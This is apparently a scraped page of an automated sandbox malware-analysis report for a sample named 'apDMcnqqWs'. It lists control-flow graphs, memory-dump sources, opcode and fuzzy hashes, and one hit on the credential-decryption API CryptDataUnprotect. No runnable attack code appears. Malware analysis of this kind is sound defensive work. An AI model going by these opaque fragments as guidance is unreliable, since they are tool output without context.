                                                                                                                              control_flow_graph 2569 7ffd3488be85-7ffd3488be92 2571 7ffd3488bee7-7ffd3488bee8 2569->2571 2572 7ffd3488be94-7ffd3488beba 2569->2572 2573 7ffd3488beea 2571->2573 2574 7ffd3488bf61 2571->2574 2584 7ffd3488bef0-7ffd3488bf01 2572->2584 2588 7ffd3488bebc-7ffd3488bed9 2572->2588 2576 7ffd3488beec-7ffd3488beef 2573->2576 2577 7ffd3488bf20-7ffd3488bf42 2573->2577 2578 7ffd3488bf64-7ffd3488bf69 2574->2578 2576->2584 2580 7ffd3488bf44-7ffd3488bf4e 2577->2580 2582 7ffd3488c6f8-7ffd3488c6fc 2578->2582 2583 7ffd3488bf6a-7ffd3488bf76 2578->2583 2585 7ffd3488bf51-7ffd3488bf5f 2580->2585 2586 7ffd3488c6fe-7ffd3488c730 call 7ffd3488bb20 2582->2586 2587 7ffd3488c731-7ffd3488c735 2582->2587 2589 7ffd3488bf78-7ffd3488c39d 2583->2589 2584->2578 2591 7ffd3488bf65-7ffd3488bf69 2585->2591 2592 7ffd3488c3ea-7ffd3488c3ee 2585->2592 2586->2587 2595 7ffd3488c737-7ffd3488c747 2587->2595 2596 7ffd3488c7a2-7ffd3488c7c3 2587->2596 2588->2585 2607 7ffd3488bedb-7ffd3488bee1 2588->2607 2647 7ffd3488c821-7ffd3488c850 2589->2647 2723 7ffd3488c3a3-7ffd3488c3ae 2589->2723 2591->2582 2597 7ffd3488bf6f-7ffd3488bf76 2591->2597 2598 7ffd3488c3f0-7ffd3488c3f7 2592->2598 2599 7ffd3488c423-7ffd3488c427 2592->2599 2604 7ffd3488c74d-7ffd3488c760 2595->2604 2603 7ffd3488c7ca-7ffd3488c7db 2596->2603 2597->2589 2605 7ffd3488c3f9-7ffd3488c40d call 7ffd3488bb10 2598->2605 2610 7ffd3488c496-7ffd3488c4b7 2599->2610 2611 7ffd3488c429-7ffd3488c435 2599->2611 2608 7ffd3488c7dd-7ffd3488c7e2 2603->2608 2609 7ffd3488c7ee-7ffd3488c802 call 7ffd3488c90e 2603->2609 2604->2603 2612 7ffd3488c762-7ffd3488c77d 2604->2612 2622 7ffd3488c412-7ffd3488c422 2605->2622 2607->2580 2624 7ffd3488bee3-7ffd3488bee6 2607->2624 2608->2609 2632 7ffd3488c7e4-7ffd3488c7ec call 7ffd3488c90e 2608->2632 2628 7ffd3488c80e-7ffd3488c81e call 7ffd3488c961 2609->2628 2629 7ffd3488c804-7ffd3488c80c call 7ffd3488c961 2609->2629 2614 7ffd3488c4be-7ffd3488c4cf 2610->2614 2618 7ffd3488c43b-7ffd3488c44e 2611->2618 2627 7ffd3488c785-7ffd3488c79b call 7ffd34886da0 2612->2627 2620 7ffd3488c4d6-7ffd3488c563 call 7ffd3488c868 call 7ffd3488c8bb 2614->2620 2621 7ffd3488c4d1 2614->2621 2618->2614 2626 7ffd3488c450-7ffd3488c490 2618->2626 2659 7ffd3488c5f5-7ffd3488c605 2620->2659 2660 7ffd3488c569-7ffd3488c584 2620->2660 2621->2620 2622->2599 2624->2571 2640 7ffd3488c7a0 2627->2640 2628->2647 2648 7ffd3488c858-7ffd3488c867 2629->2648 2632->2629 2640->2632 2647->2648 2662 7ffd3488c607-7ffd3488c65c 2659->2662 2663 7ffd3488c66a-7ffd3488c680 2659->2663 2668 7ffd3488c588-7ffd3488c589 2660->2668 2665 7ffd3488c65e-7ffd3488c668 2662->2665 2663->2665 2666 7ffd3488c682-7ffd3488c6bc 2663->2666 2665->2662 2665->2663 2675 7ffd3488c6be-7ffd3488c6e2 call 7ffd34880418 2666->2675 2672 7ffd3488c5da-7ffd3488c5ea 2668->2672 2673 7ffd3488c58b-7ffd3488c5d1 2668->2673 2681 7ffd3488c5eb-7ffd3488c5ef 2672->2681 2673->2668 2689 7ffd3488c5d3-7ffd3488c5d6 2673->2689 2680 7ffd3488c6e7-7ffd3488c6f7 2675->2680 2680->2582 2681->2659 2681->2660 2689->2681 2691 7ffd3488c5d8-7ffd3488c5d9 2689->2691 2691->2672 2725 7ffd3488c3b0-7ffd3488c3d4 call 7ffd34880418 2723->2725 2727 7ffd3488c3d9-7ffd3488c3e9 2725->2727 2727->2592
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2635879106.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd34880000_apDMcnqqWs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: _O_L
                                                                                                                              • API String ID: 0-2342864437
                                                                                                                              • Opcode ID: 74515f396b51d8ac3bad642e9600962fe43deb1d5a1db4e924bba0e69f54d5a5
                                                                                                                              • Instruction ID: 4510229c663b2032c916563db3d7972542fd550d1d8071a2c3fa12c36aa31ad8
                                                                                                                              • Opcode Fuzzy Hash: 74515f396b51d8ac3bad642e9600962fe43deb1d5a1db4e924bba0e69f54d5a5
                                                                                                                              • Instruction Fuzzy Hash: 5F72E630A0D68A9FDB95DBA884626AA7BE1FF56310F6415BDD049C76D7CE3CAC02C701

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 2729 7ffd34896158-7ffd3489616a 2731 7ffd348961ba 2729->2731 2732 7ffd3489616c-7ffd348961b6 2729->2732 2733 7ffd3489620a 2731->2733 2734 7ffd348961bc-7ffd348c3a64 call 7ffd348a1cf0 2731->2734 2732->2731 2736 7ffd3489625a 2733->2736 2737 7ffd3489620c-7ffd34896222 2733->2737 2749 7ffd348c3a66-7ffd348c3a7b 2734->2749 2750 7ffd348c3a7d-7ffd348c3ad4 2734->2750 2741 7ffd348962aa-7ffd348962ba 2736->2741 2742 7ffd3489625c-7ffd3489625e 2736->2742 2745 7ffd34896272 2737->2745 2746 7ffd34896224-7ffd348a2509 2737->2746 2753 7ffd348962bc-7ffd348962bf 2741->2753 2742->2745 2751 7ffd348962c2-7ffd348962c9 2745->2751 2752 7ffd34896274-7ffd3489627e 2745->2752 2805 7ffd348a250b 2746->2805 2806 7ffd348a2543-7ffd348a25ea 2746->2806 2749->2750 2758 7ffd3489631a 2751->2758 2759 7ffd348962cc-7ffd348962d9 2751->2759 2752->2741 2753->2751 2765 7ffd3489636a 2758->2765 2766 7ffd3489631c-7ffd3489632a 2758->2766 2759->2753 2771 7ffd348962db-7ffd348962f1 2759->2771 2769 7ffd348963ba 2765->2769 2770 7ffd3489636c-7ffd34896372 2765->2770 2772 7ffd3489637a 2766->2772 2773 7ffd3489632c-7ffd34896366 2766->2773 2775 7ffd3489640a 2769->2775 2776 7ffd348963bb-7ffd348963be 2769->2776 2777 7ffd348963c2 2770->2777 2778 7ffd34896374-7ffd34896376 2770->2778 2780 7ffd348963ca 2772->2780 2781 7ffd3489637c-7ffd348963b9 2772->2781 2773->2765 2783 7ffd3489645a-7ffd34896469 2775->2783 2784 7ffd3489640c-7ffd34896410 2775->2784 2776->2777 2785 7ffd34896412-7ffd34896419 2777->2785 2786 7ffd348963c4-7ffd348963c6 2777->2786 2778->2772 2787 7ffd3489641a 2780->2787 2788 7ffd348963cc-7ffd348963f9 2780->2788 2781->2769 2791 7ffd3489646a-7ffd34896471 2783->2791 2784->2785 2785->2787 2786->2780 2787->2791 2792 7ffd3489641c-7ffd3489642a 2787->2792 2798 7ffd34896472-7ffd34896478 2791->2798 2799 7ffd3489647a-7ffd34896488 2792->2799 2800 7ffd3489642c-7ffd34896459 2792->2800 2798->2799 2808 7ffd348964a5-7ffd348964b0 2799->2808 2809 7ffd3489648a-7ffd348964a1 2799->2809 2800->2783 2812 7ffd348a2512-7ffd348a2518 2805->2812 2848 7ffd348a25ec-7ffd348a2613 2806->2848 2808->2798 2815 7ffd348964b2-7ffd348964f6 2808->2815 2809->2808 2817 7ffd348a2528-7ffd348a2542 2812->2817 2818 7ffd348a251a-7ffd348a2526 2812->2818 2831 7ffd348965ab-7ffd348965ad 2815->2831 2832 7ffd348964fc-7ffd34896514 call 7ffd34886968 2815->2832 2818->2817 2822 7ffd348a250d-7ffd348a250e 2818->2822 2822->2812 2833 7ffd34896a72-7ffd34896abd call 7ffd34891c40 2831->2833 2834 7ffd348965b3-7ffd348965e3 2831->2834 2844 7ffd34896516-7ffd34896552 2832->2844 2845 7ffd34896582-7ffd34896593 2832->2845 2843 7ffd348965e4-7ffd348965e7 2834->2843 2850 7ffd34896687-7ffd3489668f 2843->2850 2851 7ffd348965e8-7ffd34896624 2843->2851 2846 7ffd34896595 2845->2846 2847 7ffd3489659a-7ffd348965a8 2845->2847 2846->2847 2847->2831 2860 7ffd348a2615 2848->2860 2861 7ffd348a261d-7ffd348a2631 2848->2861 2858 7ffd34896690-7ffd348966ce 2850->2858 2851->2843 2874 7ffd34896626-7ffd34896686 2851->2874 2868 7ffd348966d5-7ffd34896705 2858->2868 2869 7ffd348966d0 2858->2869 2863 7ffd348a261b-7ffd348a261c 2860->2863 2864 7ffd348a279e-7ffd348a27b1 2860->2864 2865 7ffd348a2637-7ffd348a2653 2861->2865 2866 7ffd348a277f-7ffd348a2787 2861->2866 2863->2861 2877 7ffd348a27bb-7ffd348a27d9 2864->2877 2878 7ffd348a27b3-7ffd348a27ba 2864->2878 2865->2866 2876 7ffd348a2659-7ffd348a265c 2865->2876 2866->2848 2870 7ffd348a278d-7ffd348a279d 2866->2870 2880 7ffd34896a68-7ffd34896a6f 2868->2880 2881 7ffd3489670b-7ffd3489671d 2868->2881 2869->2868 2874->2850 2882 7ffd348a266e-7ffd348a2678 2876->2882 2883 7ffd348a265e-7ffd348a266c 2876->2883 2888 7ffd348a27f7-7ffd348b26f9 2877->2888 2889 7ffd348a27db-7ffd348a27f6 2877->2889 2878->2877 2880->2833 2881->2858 2886 7ffd34896723-7ffd3489672f 2881->2886 2887 7ffd348a267f-7ffd348a26ae call 7ffd348a16a0 2882->2887 2883->2887 2894 7ffd34896730 2886->2894 2895 7ffd348968f1-7ffd3489692d 2886->2895 2905 7ffd348a26b0 2887->2905 2936 7ffd348b2700-7ffd348b2702 2888->2936 2937 7ffd348b26fb call 7ffd348b2560 2888->2937 2889->2888 2900 7ffd34896735-7ffd34896776 call 7ffd34886630 2894->2900 2902 7ffd3489696b-7ffd34896982 2895->2902 2903 7ffd3489692f-7ffd34896938 2895->2903 2945 7ffd34896778-7ffd34896781 2900->2945 2913 7ffd348969ec-7ffd34896a0b 2902->2913 2914 7ffd34896984-7ffd34896993 2902->2914 2907 7ffd3489694a-7ffd34896961 2903->2907 2908 7ffd3489693a-7ffd34896940 2903->2908 2905->2905 2911 7ffd348a26b2-7ffd348a26e9 2905->2911 2907->2902 2920 7ffd34896963-7ffd34896964 2907->2920 2908->2907 2935 7ffd348a26f0-7ffd348a26f2 2911->2935 2921 7ffd34896a0e-7ffd34896a24 2913->2921 2914->2913 2927 7ffd34896995-7ffd34896998 2914->2927 2920->2902 2925 7ffd348967e6-7ffd34896805 2921->2925 2926 7ffd34896a2a-7ffd34896a2f 2921->2926 2925->2895 2932 7ffd34896a37-7ffd34896a62 2926->2932 2927->2913 2930 7ffd3489699a-7ffd3489699e 2927->2930 2930->2913 2934 7ffd348969a0-7ffd348969e7 call 7ffd34890e38 2930->2934 2932->2880 2932->2881 2934->2913 2939 7ffd348a271a 2935->2939 2940 7ffd348a26f4-7ffd348a26f5 2935->2940 2942 7ffd348b271e-7ffd348b2723 2936->2942 2943 7ffd348b2704-7ffd348b270b 2936->2943 2937->2936 2941 7ffd348a271c-7ffd348a2779 call 7ffd348a1cf0 2939->2941 2946 7ffd348a26f9-7ffd348a2709 2940->2946 2941->2865 2941->2866 2949 7ffd348b2724-7ffd348b2750 2942->2949 2948 7ffd348b270d-7ffd348b271d 2943->2948 2943->2949 2956 7ffd34896788-7ffd348967e1 call 7ffd3488f708 2945->2956 2950 7ffd348a2718 2946->2950 2951 7ffd348a270b-7ffd348a2712 2946->2951 2964 7ffd348b2767 2949->2964 2965 7ffd348b2752-7ffd348b2755 2949->2965 2950->2941 2951->2946 2952 7ffd348a2714-7ffd348a2716 2951->2952 2952->2950 2956->2921 2968 7ffd348b2769-7ffd348b2772 2964->2968 2965->2964 2967 7ffd348b2757-7ffd348b275a 2965->2967 2967->2964 2970 7ffd348b275c-7ffd348b2765 2967->2970 2970->2968
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2635879106.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd34880000_apDMcnqqWs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: Hcv4
                                                                                                                              • API String ID: 0-1839526002
                                                                                                                              • Opcode ID: 541b35773d40046bfc397c45ac8e5c1ccb435d9b55ca524c563aa849a943c018
                                                                                                                              • Instruction ID: eb2f54ed0a1601bb59978a7df3ee499f9e2d41338f57a796c7041c4ef50965d9
                                                                                                                              • Opcode Fuzzy Hash: 541b35773d40046bfc397c45ac8e5c1ccb435d9b55ca524c563aa849a943c018
                                                                                                                              • Instruction Fuzzy Hash: E4422731B0CA8A4FD794EF6C84B55EA7BE1FF95324B0841BAD54DC7193DA2CA846C780

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 2971 7ffd34891d8a call 7ffd348910d8 2973 7ffd34891d8f-7ffd34891d90 2971->2973 2974 7ffd34891d94-7ffd34891d9f 2973->2974 2976 7ffd34891d45-7ffd34891d4a 2974->2976 2977 7ffd34891da1-7ffd34891db9 2974->2977 2976->2974 2979 7ffd34891d4c-7ffd34891d62 2976->2979 2978 7ffd34891dbb-7ffd34891ddc 2977->2978 2982 7ffd34891e26-7ffd34891e3b 2978->2982 2983 7ffd34891dde-7ffd34891de6 2978->2983 2979->2978 2981 7ffd34891d64-7ffd34891d67 2979->2981 2984 7ffd34891de8-7ffd34891e0e 2981->2984 2985 7ffd34891d69-7ffd34891d70 2981->2985 3004 7ffd34891e42-7ffd34891e45 call 7ffd348910b8 2982->3004 2983->2984 2989 7ffd34891e8f-7ffd34891e93 2984->2989 2990 7ffd34891e10-7ffd34891e12 2984->2990 2985->2971 2991 7ffd34891e96-7ffd34891e99 2989->2991 2992 7ffd34891e94-7ffd34891e95 2989->2992 2993 7ffd34891e8e 2990->2993 2994 7ffd34891e14 2990->2994 2995 7ffd34891e9a-7ffd34891e9e 2991->2995 2992->2991 2993->2989 2997 7ffd34891e56-7ffd34891e5b 2994->2997 2998 7ffd34891e16-7ffd34891e18 2994->2998 2999 7ffd34891ea0-7ffd34891ea5 2995->2999 3000 7ffd34891e5c-7ffd34891e65 2997->3000 2998->2992 3001 7ffd34891e1a 2998->3001 3002 7ffd34891ea7 2999->3002 3003 7ffd34891ea8-7ffd34891ebd 2999->3003 3005 7ffd34891e67-7ffd34891e87 3000->3005 3006 7ffd34891eaf-7ffd34891ebd 3000->3006 3001->3000 3007 7ffd34891e1c-7ffd34891e1e 3001->3007 3002->3003 3009 7ffd34891ebf-7ffd34891f78 call 7ffd34891100 3003->3009 3012 7ffd34891e4a-7ffd34891e55 call 7ffd34891e5c 3004->3012 3006->3009 3007->2995 3010 7ffd34891e20-7ffd34891e24 3007->3010 3022 7ffd34891f95-7ffd34891fb9 3009->3022 3023 7ffd34891f7a-7ffd34891f91 3009->3023 3010->2982 3010->2999 3012->2997 3025 7ffd34891fda-7ffd34891fe6 3022->3025 3026 7ffd34891fbb-7ffd34891fd5 3022->3026 3027 7ffd34891f93 3023->3027 3030 7ffd3489209b-7ffd3489209d 3025->3030 3031 7ffd34891fec-7ffd34892004 call 7ffd348868d8 3025->3031 3026->3025 3027->3027 3032 7ffd3489256a-7ffd348925b5 call 7ffd34891c40 3030->3032 3033 7ffd348920a3-7ffd3489212b 3030->3033 3039 7ffd34892006-7ffd34892041 3031->3039 3040 7ffd34892072-7ffd34892083 3031->3040 3050 7ffd348921ad-7ffd348921be 3033->3050 3051 7ffd34892131-7ffd3489216f 3033->3051 3039->3040 3041 7ffd34892085 3040->3041 3042 7ffd3489208a-7ffd34892098 3040->3042 3041->3042 3042->3030 3052 7ffd348921c5-7ffd348921f5 3050->3052 3053 7ffd348921c0 3050->3053 3057 7ffd34892180-7ffd348921a6 3051->3057 3058 7ffd348921fb-7ffd3489220d 3052->3058 3059 7ffd34892560-7ffd34892567 3052->3059 3053->3052 3057->3050 3058->3057 3060 7ffd34892213-7ffd3489221f 3058->3060 3059->3032 3062 7ffd34892225-7ffd34892266 call 7ffd34886630 3060->3062 3063 7ffd348923e9-7ffd34892425 3060->3063 3088 7ffd34892268-7ffd34892271 3062->3088 3065 7ffd34892427-7ffd34892430 3063->3065 3066 7ffd34892463-7ffd3489247a 3063->3066 3068 7ffd34892442-7ffd34892459 3065->3068 3069 7ffd34892432-7ffd34892438 3065->3069 3073 7ffd3489247c-7ffd3489248b 3066->3073 3074 7ffd348924e4-7ffd34892503 3066->3074 3068->3066 3077 7ffd3489245b-7ffd3489245c 3068->3077 3069->3068 3073->3074 3083 7ffd3489248d-7ffd34892490 3073->3083 3076 7ffd34892506-7ffd3489251c 3074->3076 3080 7ffd348922de-7ffd34892330 3076->3080 3081 7ffd34892522-7ffd34892527 3076->3081 3077->3066 3080->3063 3085 7ffd3489252f-7ffd3489255a 3081->3085 3083->3074 3084 7ffd34892492-7ffd34892496 3083->3084 3084->3074 3087 7ffd34892498-7ffd348924df call 7ffd34890e38 3084->3087 3085->3058 3085->3059 3087->3074 3090 7ffd34892278-7ffd3489227f 3088->3090 3091 7ffd34892281-7ffd34892295 call 7ffd3488f708 3090->3091 3095 7ffd3489229a-7ffd348922d9 3091->3095 3095->3076
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2635879106.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd34880000_apDMcnqqWs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: Hcv4
                                                                                                                              • API String ID: 0-1839526002
                                                                                                                              • Opcode ID: a8e936e971118d12362ee2e6f184f906d1e3fe00d6903b688070f66f087b4446
                                                                                                                              • Instruction ID: 283e9d29a5032ee8bcc478c6364c6f5e0c27c9ae5f87e89331782a0deaa47ac6
                                                                                                                              • Opcode Fuzzy Hash: a8e936e971118d12362ee2e6f184f906d1e3fe00d6903b688070f66f087b4446
                                                                                                                              • Instruction Fuzzy Hash: 6A52D730A0CA4E8FEB95EF68C8A46A97BE1FF59310F5445A9D41DC7296CF38E846C740
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2635879106.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd34880000_apDMcnqqWs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: LN_L
                                                                                                                              • API String ID: 0-3368801395
                                                                                                                              • Opcode ID: d16b64dd5ddfc63212655ed699f18e7afa6b1c98f385ae86c0c25655dffa2b17
                                                                                                                              • Instruction ID: 1f9e4799b3b2a380b0a360e4e621360078248a1b2eff15f36c66a5405d5695cc
                                                                                                                              • Opcode Fuzzy Hash: d16b64dd5ddfc63212655ed699f18e7afa6b1c98f385ae86c0c25655dffa2b17
                                                                                                                              • Instruction Fuzzy Hash: 02022A22B1DA8A1FD765A7AC98615F67FE0EF56324B0801BFD18DC7193DD2C78068385
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2635879106.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd34880000_apDMcnqqWs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: Hcv4
                                                                                                                              • API String ID: 0-1839526002
                                                                                                                              • Opcode ID: b84b5edbd01749fa33bfe8af7d478888a2e6a25babf0a71abe89ad68f3beca4d
                                                                                                                              • Instruction ID: 6aa24ab458c5fcda72473209a38f715a5afc002950d2ba9627671eaa87f435d5
                                                                                                                              • Opcode Fuzzy Hash: b84b5edbd01749fa33bfe8af7d478888a2e6a25babf0a71abe89ad68f3beca4d
                                                                                                                              • Instruction Fuzzy Hash: 9122B631B08A4E8FEB95EF58C4A46A977E2FF99310F5445A9D41DC7296CB38EC42CB40
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2635879106.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd34880000_apDMcnqqWs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: k>P_^
                                                                                                                              • API String ID: 0-1826688336
                                                                                                                              • Opcode ID: bdb39f925da86ffb3e82834be1ab2e8ca467ffa6de3784d94374ca72d349f30f
                                                                                                                              • Instruction ID: 7d1220eba9dcf2a106b9709e22d1944e6896b6cbddee789c16560b7fd00b68f4
                                                                                                                              • Opcode Fuzzy Hash: bdb39f925da86ffb3e82834be1ab2e8ca467ffa6de3784d94374ca72d349f30f
                                                                                                                              • Instruction Fuzzy Hash: C7128D30A0D68A4FEB95EBA8C8A56ED7BA1FF47310F0401B9D149D7293CE3D6846DB41
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2642096203.00007FFD34A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A40000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd34a40000_apDMcnqqWs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CryptDataUnprotect
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 834300711-0
                                                                                                                              • Opcode ID: 60418f303ba9e152c31484974b32ab8e19608556f68dbd6a9006a18ce6f09eca
                                                                                                                              • Instruction ID: d82528157b5f9b15140a0b9462a9ea5f73470d6b6871ae550917fb88d2835522
                                                                                                                              • Opcode Fuzzy Hash: 60418f303ba9e152c31484974b32ab8e19608556f68dbd6a9006a18ce6f09eca
                                                                                                                              • Instruction Fuzzy Hash: B1412D30A1CB889FDB19DB5C98156B97BF0EF56311F0441AFE449C3253CA24A856C7D2
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2642096203.00007FFD34A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A40000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd34a40000_apDMcnqqWs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 41a3abc2e1f38dc10855a48e6f55f0a6d109a6f92dc0343402bb4237620861ac
                                                                                                                              • Instruction ID: 643141893f60e86fd918e6a9324de346da34f0eabcc4c67b93a04ad417f334f1
                                                                                                                              • Opcode Fuzzy Hash: 41a3abc2e1f38dc10855a48e6f55f0a6d109a6f92dc0343402bb4237620861ac
                                                                                                                              • Instruction Fuzzy Hash: 16B25672B0D6864FEB99DB7884A95B87BE0EF56324B1401FED089C75D2DE2CAC42C740
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2642096203.00007FFD34A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A40000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd34a40000_apDMcnqqWs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: #8_H
                                                                                                                              • API String ID: 0-4238336989
                                                                                                                              • Opcode ID: ff815d10f77897dc7b095bce43019a18fcf9aef4ccffd02f77d3692e607b80f4
                                                                                                                              • Instruction ID: 256118f4d8608856d2d385156b385b5a1142a508d33c71a8d44df025112a1e01
                                                                                                                              • Opcode Fuzzy Hash: ff815d10f77897dc7b095bce43019a18fcf9aef4ccffd02f77d3692e607b80f4
                                                                                                                              • Instruction Fuzzy Hash: 3FB1D231B1C90A8FEBA4DB6884A66BC77D1EF5A314F1401B9D54EC3392DE2CAC419741
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2642096203.00007FFD34A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A40000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd34a40000_apDMcnqqWs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: x4
                                                                                                                              • API String ID: 0-3768222699
                                                                                                                              • Opcode ID: 72117bfce5fbed73eb25776a24381f4967905b7e611dbc7d398b006a7aa871c3
                                                                                                                              • Instruction ID: 26a4701ec0da1677c64f9dd70a78235e5d934f18981ce83017760bc26883d95a
                                                                                                                              • Opcode Fuzzy Hash: 72117bfce5fbed73eb25776a24381f4967905b7e611dbc7d398b006a7aa871c3
                                                                                                                              • Instruction Fuzzy Hash: D5910725A0D6C94FE762527459711E97FE4EF83328F2802FAD6D8CB4D3DD1C281A9352
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2635879106.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd34880000_apDMcnqqWs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 5653e56988f03cea1cbe0b2c820d67fc0e63857280b539595b9a3d2c20ec66cf
                                                                                                                              • Instruction ID: 5ebc7274a869b072388bb4dccd31c591bdc6299d9c862e397cb9864940743ad9
                                                                                                                              • Opcode Fuzzy Hash: 5653e56988f03cea1cbe0b2c820d67fc0e63857280b539595b9a3d2c20ec66cf
                                                                                                                              • Instruction Fuzzy Hash: B742F731A0EB854FD756DB2888A15757BE1EF57310B0942FBD089CB1A3DE2CAC46D782
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2635879106.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd34880000_apDMcnqqWs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 633a6246865c941a406af06c0d430fb8eb1081e427f726101ce161895fbade52
                                                                                                                              • Instruction ID: 9e8bdd3d450fcb0009823813a779f46f7c1bb34f5c9724298472c70b634091cd
                                                                                                                              • Opcode Fuzzy Hash: 633a6246865c941a406af06c0d430fb8eb1081e427f726101ce161895fbade52
                                                                                                                              • Instruction Fuzzy Hash: 6C320631B0CA8A4FDB99DF6884A56B97BE1FF96310F0405BED049C72D2DE2DA846C741
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2642096203.00007FFD34A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A40000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd34a40000_apDMcnqqWs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: fd0bf2d0bbc251b54ac5efe2b13ce1643f7ab5925834e869b53e4ae9c410ac52
                                                                                                                              • Instruction ID: f8f8b3af7393463e5127f183ad1a687564136a2bb3fcfc2e29c247f2ee00da0b
                                                                                                                              • Opcode Fuzzy Hash: fd0bf2d0bbc251b54ac5efe2b13ce1643f7ab5925834e869b53e4ae9c410ac52
                                                                                                                              • Instruction Fuzzy Hash: 2F32B232A086469FD750EFBCD4B56EA77A0FF45328B18517AD18DD7283DA38B846C780
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2635879106.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd34880000_apDMcnqqWs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 4a4d131bfd88a1b0dfa5932a5bbaf1d97661c3d5fba0b3f13c04cdb3ce95dc66
                                                                                                                              • Instruction ID: 50335d69d855fc0f375b72e2e6b9b25ca9b33c7109264aabc360ca2a430285bc
                                                                                                                              • Opcode Fuzzy Hash: 4a4d131bfd88a1b0dfa5932a5bbaf1d97661c3d5fba0b3f13c04cdb3ce95dc66
